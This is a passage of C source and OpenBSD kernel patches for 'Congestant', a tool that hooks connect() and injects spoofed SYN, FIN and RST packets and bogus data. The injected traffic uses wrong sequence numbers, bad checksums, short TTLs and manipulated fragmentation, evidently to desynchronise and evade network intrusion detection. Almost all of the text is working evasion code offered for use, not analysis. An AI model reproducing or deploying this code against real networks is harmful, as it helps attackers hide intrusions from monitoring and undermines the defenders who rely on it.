| struct cong_ip_header *ip; | |
| struct cong_icmp_header *icmp; | |
| if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) | |
| { | |
| perror("socket"); | |
| exit(1); | |
| } | |
| tvwait.tv_sec=0; | |
| tvwait.tv_usec=500; | |
| gettimeofday(&tv,NULL); | |
| timestamp=tv.tv_sec+3; // 3 second timeout | |
| DEBUG("Determining ttl..."); | |
| while(tv.tv_sec<=timestamp) | |
| { | |
| gettimeofday(&tv,NULL); | |
| if (ttl<50) | |
| { | |
| cong_send_icmp(source,dest,ttl,1,ttl); | |
| cong_send_icmp(source,dest,ttl,1,ttl); | |
| cong_send_icmp(source,dest,ttl,1,ttl++); | |
| } | |
| FD_ZERO(&fds); | |
| FD_SET(sock,&fds); | |
| select(sock+1,&fds,NULL,NULL,&tvwait); | |
| if (FD_ISSET(sock,&fds)) | |
| { | |
| if (bread=read(sock,buffer,sizeof(buffer))) | |
| { | |
| /* should we practice what we preach? | |
| nah... too much effort :p */ | |
| ip=(struct cong_ip_header *)buffer; | |
| if (ip->ip_src!=dest) | |
| continue; | |
| icmp=(struct cong_icmp_header *)(buffer + | |
| ((ip->ip_hl)<<2)); | |
| if (icmp->icmp_type!=0) | |
| continue; | |
| if (ntohs(icmp->icmp_seq)<result) | |
| result=ntohs(icmp->icmp_seq); | |
| } | |
| } | |
| } | |
| if (cong_debug) | |
| fprintf(stderr,"%d\n",result); | |
| close(sock); | |
| return result; | |
| } | |
| /* This is our init routine - reads conf env var*/ | |
| /* On the glibc box I tested, you cant dlopen from within | |
| * _init, so there is a little hack here */ | |
| #if __GLIBC__ == 2 | |
| int cong_start(void) | |
| #else | |
| int _init(void) | |
| #endif | |
| { | |
| void *handle; | |
| char *conf; | |
| #ifndef __OpenBSD__ | |
| handle=dlopen(LIB_PATH,1); | |
| if (!handle) | |
| { | |
| fprintf(stderr,"Congestant Error: Can't load libc.\n"); | |
| return 0; | |
| } | |
| #if __linux__ || (__svr4__ && __sun__) || sgi || __osf__ | |
| cong_connect = dlsym(handle, "connect"); | |
| #else | |
| cong_connect = dlsym(handle, "_connect"); | |
| #endif | |
| if (!cong_connect) | |
| { | |
| fprintf(stderr,"Congestant Error: Can't find connect().\n"); | |
| return -1; | |
| } | |
| #endif /* not openbsd */ | |
| memset(&cong_config,0,sizeof(struct cong_config)); | |
| if (conf=getenv("CONGCONF")) | |
| { | |
| char *token; | |
| token=strtok(conf,","); | |
| while (token) | |
| { | |
| if (!strcmp(token,"OH")) | |
| cong_config.one_host_attack=1; | |
| else if (!strcmp(token,"FS")) | |
| cong_config.fin_seq=1; | |
| else if (!strcmp(token,"RS")) | |
| cong_config.rst_seq=1; | |
| else if (!strcmp(token,"SS")) | |
| cong_config.syn_seq=1; | |
| else if (!strcmp(token,"DS")) | |
| cong_config.data_seq=1; | |
| else if (!strcmp(token,"FC")) | |
| cong_config.fin_chk=1; | |
| else if (!strcmp(token,"RC")) | |
| cong_config.rst_chk=1; | |
| else if (!strcmp(token,"SC")) | |
| cong_config.syn_chk=1; | |
| else if (!strcmp(token,"DC")) | |
| cong_config.data_chk=1; | |
| else if (!strcmp(token,"FT")) | |
| { | |
| cong_config.fin_ttl=1; | |
| cong_config.ttl=1; | |
| } | |
| else if (!strcmp(token,"RT")) | |
| { | |
| cong_config.rst_ttl=1; | |
| cong_config.ttl=1; | |
| } | |
| else if (!strcmp(token,"DT")) | |
| { | |
| cong_config.data_ttl=1; | |
| cong_config.ttl=1; | |
| } | |
| else if (!strcmp(token,"DEBUG")) | |
| cong_debug=1; | |
| token=strtok(NULL,","); | |
| } | |
| } | |
| else /* default to full sneakiness */ | |
| { | |
| cong_config.one_host_attack=1; | |
| cong_config.fin_seq=1; | |
| cong_config.rst_seq=1; | |
| cong_config.syn_seq=1; | |
| cong_config.data_seq=1; | |
| cong_config.syn_chk=1; | |
| cong_debug=1; | |
| /* assume they have kernel support */ | |
| /* attacks are only compiled in under obsd*/ | |
| cong_config.data_chk=1; | |
| cong_config.fin_chk=1; | |
| cong_config.rst_chk=1; | |
| cong_config.data_ttl=1; | |
| cong_config.fin_ttl=1; | |
| cong_config.rst_ttl=1; | |
| cong_config.ttl=1; | |
| } | |
| cong_init=1; | |
| } | |
| /* This is our definition of connect */ | |
| #if (__svr4__ && __sun__) | |
| int connect (int __fd, struct sockaddr * __addr, int __len) | |
| #else | |
| #if __GLIBC__ == 2 | |
| int connect __P ((int __fd, | |
| __CONST_SOCKADDR_ARG __addr, socklen_t __len)) | |
| #else | |
| int connect __P ((int __fd, const struct sockaddr * __addr, int __len)) | |
| #endif | |
| #endif | |
| { | |
| int result,nl; | |
| struct sockaddr_in sa; | |
| long from,to; | |
| short src,dest; | |
| unsigned long fakeseq=424242; | |
| int type=SOCK_STREAM; | |
| unsigned long realseq=0; | |
| unsigned long recvseq=0; | |
| int ttl=255,ttlseq; | |
| #if __GLIBC__ == 2 | |
| if (cong_init==0) | |
| cong_start(); | |
| #endif | |
| if (cong_init++==1) | |
| fprintf(stderr,"Congestant v1 by horizon loaded.\n"); | |
| /* quick hack so we dont waste time with udp connects */ | |
| #ifdef KERNELSUPPORT | |
| #ifdef __OpenBSD__ | |
| syscall(242,__fd,&type,&realseq,&recvseq); | |
| #endif /* openbsd */ | |
| if (type!=SOCK_STREAM) | |
| { | |
| result=syscall(SYS_connect,__fd,__addr,__len); | |
| return result; | |
| } | |
| #endif /* kernel support */ | |
| nl=sizeof(sa); | |
| getsockname(__fd,(struct sockaddr *)&sa,&nl); | |
| from=sa.sin_addr.s_addr; | |
| src=sa.sin_port; | |
| #if __GLIBC__ == 2 | |
| to=__addr.__sockaddr_in__->sin_addr.s_addr; | |
| dest=__addr.__sockaddr_in__->sin_port; | |
| #else | |
| to=((struct sockaddr_in *)__addr)->sin_addr.s_addr; | |
| dest=((struct sockaddr_in *)__addr)->sin_port; | |
| #endif | |
| if (cong_config.one_host_attack) | |
| { | |
| cong_send_tcp(inet_addr(FAKEHOST), | |
| to, 4242, dest, 0, 0, | |
| TH_SYN, NULL, 0, 0, 254); | |
| DEBUG("Spoofed Fake SYN Packet\n"); | |
| } | |
| if (cong_config.syn_chk) | |
| { | |
| /* This is a potential problem that could mess up | |
| * client programs. If necessary, we bind the socket | |
| * so that we can know what the source port will be | |
| * prior to the connection. | |
| */ | |
| if (src==0) | |
| { | |
| bind(__fd,(struct sockaddr *)&sa,nl); | |
| getsockname(__fd,(struct sockaddr *)&sa,&nl); | |
| from=sa.sin_addr.s_addr; | |
| src=sa.sin_port; | |
| } | |
| cong_send_tcp(from, to, src, dest, htonl(fakeseq), 0, | |
| TH_SYN, NULL, 0,100, 254); | |
| DEBUG("Sent Pre-Connect Desynchronizing SYN.\n"); | |
| fakeseq++; | |
| } | |
| DEBUG("Connection commencing...\n"); | |
| #ifndef __OpenBSD__ | |
| result=cong_connect(__fd,__addr,__len); | |
| #else /* not openbsd */ | |
| result=syscall(SYS_connect,__fd,__addr,__len); | |
| #endif | |
| if (result==-1) | |
| { | |
| if (errno!=EINPROGRESS) | |
| return -1; | |
| /* Let's only print the warning once */ | |
| if (cong_init++==2) | |
| fprintf(stderr,"Warning: Non-blocking connects might not work right.\n"); | |
| } | |
| /* In case an ephemeral port was assigned by connect */ | |
| nl=sizeof(sa); | |
| getsockname(__fd,(struct sockaddr *)&sa,&nl); | |
| from=sa.sin_addr.s_addr; | |
| src=sa.sin_port; | |
| if (cong_config.syn_seq) | |
| { | |
| cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0, | |
| TH_SYN, NULL, 0, 0, 254); | |
| cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0, | |
| TH_SYN, NULL, 0, 0, 254); | |
| DEBUG("Sent Desynchronizing SYNs.\n"); | |
| } | |
| if (cong_config.data_seq) | |
| { | |
| cong_send_data(from,to,src,dest,(fakeseq),0,0,254); | |
| DEBUG("Inserted 8K of data with incorrect sequence numbers.\n"); | |
| fakeseq+=8*1024; | |
| } | |
| if (cong_config.fin_seq) | |
| { | |
| cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0, | |
| TH_FIN, NULL, 0, 0, 254); | |
| cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0, | |
| TH_FIN, NULL, 0, 0, 254); | |
| DEBUG("Spoofed FINs with incorrect sequence numbers.\n"); | |
| } | |
| if (cong_config.rst_seq) | |
| { | |
| cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0, | |
| TH_RST, NULL, 0, 0, 254); | |
| cong_send_tcp(from, to, src, dest, htonl(fakeseq++), 0, | |
| TH_RST, NULL, 0, 0, 254); | |
| DEBUG("Spoofed RSTs with incorrect sequence numbers.\n"); | |
| } | |
| #ifdef KERNELSUPPORT | |
| #ifdef __OpenBSD__ | |
| if (cong_config.ttl==1) | |
| if (cong_ttl_cache!=to) | |
| { | |
| ttl=cong_find_ttl(from,to)-1; | |
| cong_ttl_cache=to; | |
| cong_ttl=ttl; | |
| } | |
| else | |
| ttl=cong_ttl; | |
| if (ttl<0) | |
| { | |
| fprintf(stderr,"Warning: The target host is too close for a ttl attack.\n"); | |
| cong_config.data_ttl=0; | |
| cong_config.fin_ttl=0; | |
| cong_config.rst_ttl=0; | |
| ttl=0; | |
| } | |
| syscall(242,__fd,&type,&realseq,&recvseq); | |
| ttlseq=realseq; | |
| #endif /*openbsd */ | |
| if (cong_config.data_ttl) | |
| { | |
| cong_send_data(from,to,src,dest,(ttlseq),recvseq,0,ttl); | |
| DEBUG("Inserted 8K of data with short ttl.\n"); | |
| ttlseq+=1024*8; | |
| } | |
| if (cong_config.fin_ttl) | |
| { | |
| cong_send_tcp(from, to, src, dest, htonl(ttlseq++), | |
| htonl(recvseq),TH_FIN, NULL, 0, 0, ttl); | |
| cong_send_tcp(from, to, src, dest, htonl(ttlseq++), | |
| htonl(recvseq),TH_FIN, NULL, 0, 0, ttl); | |
| DEBUG("Spoofed FINs with short ttl.\n"); | |
| } | |
| if (cong_config.rst_ttl) | |
| { | |
| cong_send_tcp(from, to, src, dest, htonl(ttlseq++), | |
| htonl(recvseq),TH_RST, NULL, 0, 0, ttl); | |
| cong_send_tcp(from, to, src, dest, htonl(ttlseq++), | |
| htonl(recvseq),TH_RST, NULL, 0, 0, ttl); | |
| DEBUG("Spoofed RSTs with short ttl.\n"); | |
| } | |
| if (cong_config.data_chk) | |
| { | |
| cong_send_data(from,to,src,dest,(realseq),recvseq,100,254); | |
| DEBUG("Inserted 8K of data with incorrect TCP checksums.\n"); | |
| realseq+=1024*8; | |
| } | |
| if (cong_config.fin_chk) | |
| { | |
| cong_send_tcp(from, to, src, dest, htonl(realseq++), | |
| htonl(recvseq),TH_FIN, NULL, 0, 100, 254); | |
| cong_send_tcp(from, to, src, dest, htonl(realseq++), | |
| htonl(recvseq),TH_FIN, NULL, 0, 100, 254); | |
| DEBUG("Spoofed FINs with incorrect TCP checksums.\n"); | |
| } | |
| if (cong_config.rst_chk) | |
| { | |
| cong_send_tcp(from, to, src, dest, htonl(realseq++), | |
| htonl(recvseq),TH_RST, NULL, 0, 100, 254); | |
| cong_send_tcp(from, to, src, dest, htonl(realseq++), | |
| htonl(recvseq),TH_RST, NULL, 0, 100, 254); | |
| DEBUG("Spoofed RSTs with incorrect TCP checksums.\n"); | |
| } | |
| #endif /* kernel support */ | |
| return result; | |
| } | |
| <--> | |
| <++> congestant/netinet.patch | |
| Common subdirectories: /usr/src/sys.2.4.orig/netinet/CVS and netinet/CVS | |
| diff -u /usr/src/sys.2.4.orig/netinet/in.h netinet/in.h | |
| --- /usr/src/sys.2.4.orig/netinet/in.h Tue Dec 8 10:32:38 1998 | |
| +++ netinet/in.h Tue Dec 8 10:48:33 1998 | |
| @@ -325,7 +325,10 @@ | |
| #define IPCTL_IPPORT_LASTAUTO 8 | |
| #define IPCTL_IPPORT_HIFIRSTAUTO 9 | |
| #define IPCTL_IPPORT_HILASTAUTO 10 | |
| -#define IPCTL_MAXID 11 | |
| +#define IPCTL_FRAG_HACK_HEAD 11 | |
| +#define IPCTL_FRAG_HACK_BODY 12 | |
| +#define IPCTL_OPTIONS_HACK 13 | |
| +#define IPCTL_MAXID 14 | |
| #define IPCTL_NAMES { \ | |
| { 0, 0 }, \ | |
| @@ -339,6 +342,9 @@ | |
| { "portlast", CTLTYPE_INT }, \ | |
| { "porthifirst", CTLTYPE_INT }, \ | |
| { "porthilast", CTLTYPE_INT }, \ | |
| + { "fraghackhead", CTLTYPE_INT }, \ | |
| + { "fraghackbody", CTLTYPE_INT }, \ | |
| + { "optionshack", CTLTYPE_INT }, \ | |
| } | |
| #ifndef _KERNEL | |
| diff -u /usr/src/sys.2.4.orig/netinet/ip_input.c netinet/ip_input.c | |
| --- /usr/src/sys.2.4.orig/netinet/ip_input.c Tue Dec 8 10:32:41 1998 | |
| +++ netinet/ip_input.c Tue Dec 8 10:48:33 1998 | |
| @@ -106,6 +106,10 @@ | |
| extern int ipport_hilastauto; | |
| extern struct baddynamicports baddynamicports; | |
| +extern int ip_fraghackhead; | |
| +extern int ip_fraghackbody; | |
| +extern int ip_optionshack; | |
| + | |
| extern struct domain inetdomain; | |
| extern struct protosw inetsw[]; | |
| u_char ip_protox[IPPROTO_MAX]; | |
| @@ -1314,6 +1318,15 @@ | |
| case IPCTL_IPPORT_HILASTAUTO: | |
| return (sysctl_int(oldp, oldlenp, newp, newlen, | |
| &ipport_hilastauto)); | |
| + case IPCTL_FRAG_HACK_HEAD: | |
| + return (sysctl_int(oldp, oldlenp, newp, newlen, | |
| + &ip_fraghackhead)); | |
| + case IPCTL_FRAG_HACK_BODY: | |
| + return (sysctl_int(oldp, oldlenp, newp, newlen, | |
| + &ip_fraghackbody)); | |
| + case IPCTL_OPTIONS_HACK: | |
| + return (sysctl_int(oldp, oldlenp, newp, newlen, | |
| + &ip_optionshack)); | |
| default: | |
| return (EOPNOTSUPP); | |
| } | |
| diff -u /usr/src/sys.2.4.orig/netinet/ip_output.c netinet/ip_output.c | |
| --- /usr/src/sys.2.4.orig/netinet/ip_output.c Tue Dec 8 10:32:43 1998 | |
| +++ netinet/ip_output.c Tue Dec 8 11:00:14 1998 | |
| @@ -88,6 +88,10 @@ | |
| extern int ipsec_esp_network_default_level; | |
| #endif | |
| +int ip_fraghackhead=0; | |
| +int ip_fraghackbody=0; | |
| +int ip_optionshack=0; | |
| + | |
| /* | |
| * IP output. The packet in mbuf chain m contains a skeletal IP | |
| * header (with len, off, ttl, proto, tos, src, dst). | |
| @@ -124,6 +128,9 @@ | |
| struct inpcb *inp; | |
| #endif | |
| + /* HACK */ | |
| + int fakeheadmtu; | |
| + | |
| va_start(ap, m0); | |
| opt = va_arg(ap, struct mbuf *); | |
| ro = va_arg(ap, struct route *); | |
| @@ -144,7 +151,50 @@ | |
| m = ip_insertoptions(m, opt, &len); | |
| hlen = len; | |
| } | |
| + /* HACK */ | |
| + else if (ip_optionshack && !(flags & (IP_RAWOUTPUT|IP_FORWARDING))) | |
| + { | |
| + struct mbuf *n=NULL; | |
| + register struct ip* ip= mtod(m, struct ip*); | |
| + | |
| + if (m->m_flags & M_EXT || m->m_data - 40 < m->m_pktdat) | |
| + { | |
| + MGETHDR(n, M_DONTWAIT, MT_HEADER); | |
| + if (n) | |
| + { | |
| + n->m_pkthdr.len = m->m_pkthdr.len + 40; | |
| + m->m_len -= sizeof(struct ip); | |
| + m->m_data += sizeof(struct ip); | |
| + n->m_next = m; | |
| + m = n; | |
| + m->m_len = 40 + sizeof(struct ip); | |
| + m->m_data += max_linkhdr; | |
| + bcopy((caddr_t)ip, mtod(m, caddr_t), | |
| + sizeof(struct ip)); | |
| + } | |
| + } | |
| + else | |
| + { | |
| + m->m_data -= 40; | |
| + m->m_len += 40; | |
| + m->m_pkthdr.len += 40; | |
| + ovbcopy((caddr_t)ip, mtod(m, caddr_t), | |
| + sizeof(struct ip)); | |
| + n++; /* make n!=0 */ | |
| + } | |
| + if (n!=0) | |
| + { | |
| + ip = mtod(m, struct ip *); | |
| + memset((caddr_t)(ip+1),0,40); | |
| + ip->ip_len += 40; | |
| + | |
| + hlen=60; | |
| + len=60; | |
| + } | |
| + } | |
| + | |
| ip = mtod(m, struct ip *); | |
| + | |
| /* | |
| * Fill in IP header. | |
| */ | |
| @@ -721,7 +771,15 @@ | |
| /* | |
| * If small enough for interface, can just send directly. | |
| */ | |
| - if ((u_int16_t)ip->ip_len <= ifp->if_mtu) { | |
| + | |
| + /* HACK */ | |
| + | |
| + fakeheadmtu=ifp->if_mtu; | |
| + | |
| + if ((ip_fraghackhead) && !(flags & (IP_RAWOUTPUT|IP_FORWARDING))) | |
| + fakeheadmtu=ip_fraghackhead; | |
| + | |
| + if ((u_int16_t)ip->ip_len <= fakeheadmtu/*ifp->if_mtu*/) { | |
| ip->ip_len = htons((u_int16_t)ip->ip_len); | |
| ip->ip_off = htons((u_int16_t)ip->ip_off); | |
| ip->ip_sum = 0; | |
| @@ -738,7 +796,10 @@ | |
| ipstat.ips_cantfrag++; | |
| goto bad; | |
| } | |
| - len = (ifp->if_mtu - hlen) &~ 7; | |
| + | |
| +/* HACK */ | |
| + | |
| + len = (/*ifp->if_mtu*/fakeheadmtu - hlen) &~ 7; | |
| if (len < 8) { | |
| error = EMSGSIZE; | |
| goto bad; | |
| @@ -748,6 +809,9 @@ | |
| int mhlen, firstlen = len; | |
| struct mbuf **mnext = &m->m_nextpkt; | |
| + /*HACK*/ | |
| + int first=0; | |
| + | |
| /* | |
| * Loop through length of segment after first fragment, | |
| * make new header and copy data of each part and link onto chain. | |
| @@ -755,7 +819,9 @@ | |
| m0 = m; | |
| mhlen = sizeof (struct ip); | |
| for (off = hlen + len; off < (u_int16_t)ip->ip_len; off += len) { | |
| - MGETHDR(m, M_DONTWAIT, MT_HEADER); | |
| + if (first && ip_fraghackbody) | |
| + len=(ip_fraghackbody-hlen) &~7; | |
| + MGETHDR(m, M_DONTWAIT, MT_HEADER); | |
| if (m == 0) { | |
| error = ENOBUFS; | |
| ipstat.ips_odropped++; | |
| @@ -791,6 +857,7 @@ | |
| mhip->ip_sum = 0; | |
| mhip->ip_sum = in_cksum(m, mhlen); | |
| ipstat.ips_ofragments++; | |
| + first=1; | |
| } | |
| /* | |
| * Update first fragment by trimming what's been copied out | |
| Common subdirectories: /usr/src/sys.2.4.orig/netinet/libdeslite and netinet/libdeslite | |
| diff -u /usr/src/sys.2.4.orig/netinet/tcp_subr.c netinet/tcp_subr.c | |
| --- /usr/src/sys.2.4.orig/netinet/tcp_subr.c Tue Dec 8 10:32:45 1998 | |
| +++ netinet/tcp_subr.c Tue Dec 8 10:48:33 1998 | |
| @@ -465,3 +465,18 @@ | |
| if (tp) | |
| tp->snd_cwnd = tp->t_maxseg; | |
| } | |
| + | |
| +/* HACK - This is a tcp subroutine added to grab the sequence numbers */ | |
| + | |
| +void tcp_getseq(struct socket *so, struct mbuf *m) | |
| +{ | |
| + struct inpcb *inp; | |
| + struct tcpcb *tp; | |
| + | |
| + if ((inp=sotoinpcb(so)) && (tp=intotcpcb(inp))) | |
| + { | |
| + m->m_len=sizeof(unsigned long)*2; | |
| + *(mtod(m,unsigned long *))=tp->snd_nxt; | |
| + *((mtod(m,unsigned long *))+1)=tp->rcv_nxt; | |
| + } | |
| +} | |
| diff -u /usr/src/sys.2.4.orig/netinet/tcp_usrreq.c netinet/tcp_usrreq.c | |
| --- /usr/src/sys.2.4.orig/netinet/tcp_usrreq.c Tue Dec 8 10:32:45 1998 | |
| +++ netinet/tcp_usrreq.c Tue Dec 8 10:48:33 1998 | |
| @@ -363,6 +363,10 @@ | |
| in_setsockaddr(inp, nam); | |
| break; | |
| + case PRU_SOCKINFO: | |
| + tcp_getseq(so,m); | |
| + break; | |
| + | |
| case PRU_PEERADDR: | |
| in_setpeeraddr(inp, nam); | |
| break; | |
| diff -u /usr/src/sys.2.4.orig/netinet/tcp_var.h netinet/tcp_var.h | |
| --- /usr/src/sys.2.4.orig/netinet/tcp_var.h Tue Dec 8 10:32:45 1998 | |
| +++ netinet/tcp_var.h Tue Dec 8 10:48:34 1998 | |
| @@ -291,6 +291,8 @@ | |
| void tcp_pulloutofband __P((struct socket *, | |
| struct tcpiphdr *, struct mbuf *)); | |
| void tcp_quench __P((struct inpcb *, int)); | |
| +/*HACK*/ | |
| +void tcp_getseq __P((struct socket *, struct mbuf *)); | |
| int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); | |
| void tcp_respond __P((struct tcpcb *, | |
| struct tcpiphdr *, struct mbuf *, tcp_seq, tcp_seq, int)); | |
| <--> | |
| <++> congestant/kern.patch | |
| --- /usr/src/sys.2.4.orig/kern/uipc_syscalls.c Thu Dec 3 11:00:01 1998 | |
| +++ kern/uipc_syscalls.c Thu Dec 3 11:13:44 1998 | |
| @@ -924,6 +924,53 @@ | |
| } | |
| /* | |
| + * Get socket information. HACK | |
| + */ | |
| + | |
| +/* ARGSUSED */ | |
| +int | |
| +sys_getsockinfo(p, v, retval) | |
| + struct proc *p; | |
| + void *v; | |
| + register_t *retval; | |
| +{ | |
| + register struct sys_getsockinfo_args /* { | |
| + syscallarg(int) fdes; | |
| + syscallarg(int *) type; | |
| + syscallarg(int *) seq; | |
| + syscallarg(int *) ack; | |
| + } */ *uap = v; | |
| + struct file *fp; | |
| + register struct socket *so; | |
| + struct mbuf *m; | |
| + int error; | |
| + | |
| + if ((error = getsock(p->p_fd, SCARG(uap, fdes), &fp)) != 0) | |
| + return (error); | |
| + | |
| + so = (struct socket *)fp->f_data; | |
| + | |
| + error = copyout((caddr_t)&(so->so_type), (caddr_t)SCARG(uap, type), (u_int)sizeof(short)); | |
| + | |
| + if (!error && (so->so_type==SOCK_STREAM)) | |
| + { | |
| + m = m_getclr(M_WAIT, MT_DATA); | |
| + if (m == NULL) | |
| + return (ENOBUFS); | |
| + | |
| + error = (*so->so_proto->pr_usrreq)(so, PRU_SOCKINFO, m, 0, 0); | |
| + | |
| + if (!error) | |
| + error = copyout(mtod(m,caddr_t), (caddr_t)SCARG(uap, seq), (u_int)sizeof(long)); | |
| + if (!error) | |
| + error = copyout(mtod(m,caddr_t)+sizeof(long), (caddr_t)SCARG(uap, ack), (u_int)sizeof(long)); | |
| + m_freem(m); | |
| + } | |
| + | |
| + return error; | |
| +} | |
| + | |
| +/* | |
| * Get name of peer for connected socket. | |
| */ | |
| /* ARGSUSED */ | |
| --- /usr/src/sys.2.4.orig/kern/syscalls.master Thu Dec 3 11:00:00 1998 | |
| +++ kern/syscalls.master Thu Dec 3 11:14:44 1998 | |
| @@ -476,7 +476,8 @@ | |
| 240 STD { int sys_nanosleep(const struct timespec *rqtp, \ | |
| struct timespec *rmtp); } | |
| 241 UNIMPL | |
| -242 UNIMPL | |
| +242 STD { int sys_getsockinfo(int fdes, int *type, \ | |
| + int *seq, int *ack); } | |
| 243 UNIMPL | |
| 244 UNIMPL | |
| 245 UNIMPL | |
| <--> | |
| <++> congestant/sys.patch | |
| --- /usr/src/sys.2.4.orig/sys/protosw.h Thu Dec 3 11:00:39 1998 | |
| +++ sys/protosw.h Thu Dec 3 11:16:41 1998 | |
| @@ -148,8 +148,8 @@ | |
| #define PRU_SLOWTIMO 19 /* 500ms timeout */ | |
| #define PRU_PROTORCV 20 /* receive from below */ | |
| #define PRU_PROTOSEND 21 /* send to below */ | |
| - | |
| -#define PRU_NREQ 21 | |
| +#define PRU_SOCKINFO 22 | |
| +#define PRU_NREQ 22 | |
| #ifdef PRUREQUESTS | |
| char *prurequests[] = { | |
| @@ -158,7 +158,7 @@ | |
| "RCVD", "SEND", "ABORT", "CONTROL", | |
| "SENSE", "RCVOOB", "SENDOOB", "SOCKADDR", | |
| "PEERADDR", "CONNECT2", "FASTTIMO", "SLOWTIMO", | |
| - "PROTORCV", "PROTOSEND", | |
| + "PROTORCV", "PROTOSEND", "SOCKINFO", | |
| }; | |
| #endif | |
| <--> | |
| ----[ EOF | |